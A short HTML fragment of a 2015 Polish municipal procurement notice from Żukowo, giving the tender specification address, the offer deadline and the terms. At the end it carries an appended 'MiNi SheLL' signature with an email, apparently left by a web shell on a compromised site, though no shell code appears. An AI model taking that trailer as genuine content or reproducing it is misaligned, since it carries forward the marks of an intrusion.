<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zukowo.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Żukowie, ul.
Gdańska 52, 83-330 Żukowo; Referat Zamówień Publicznych. Cena specyfikacji w wersji papierowej - 15,00
PLN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2015 godzina 12:00, miejsce: Urząd Gminy w Żukowie, ul. Gdańska 52, 83-330 Żukowo; pok. nr 3 - Biuro Obsługi
Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com